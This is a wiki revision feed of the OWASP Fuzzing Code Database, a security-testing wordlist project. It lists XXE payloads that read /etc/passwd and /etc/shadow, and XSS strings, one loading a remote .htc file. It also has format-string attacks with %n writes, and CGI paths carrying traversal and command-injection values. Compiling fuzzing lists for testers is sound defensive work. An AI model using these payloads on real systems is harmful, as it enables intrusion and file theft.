&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80082</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80082"/>
				<updated>2010-03-17T21:15:11Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
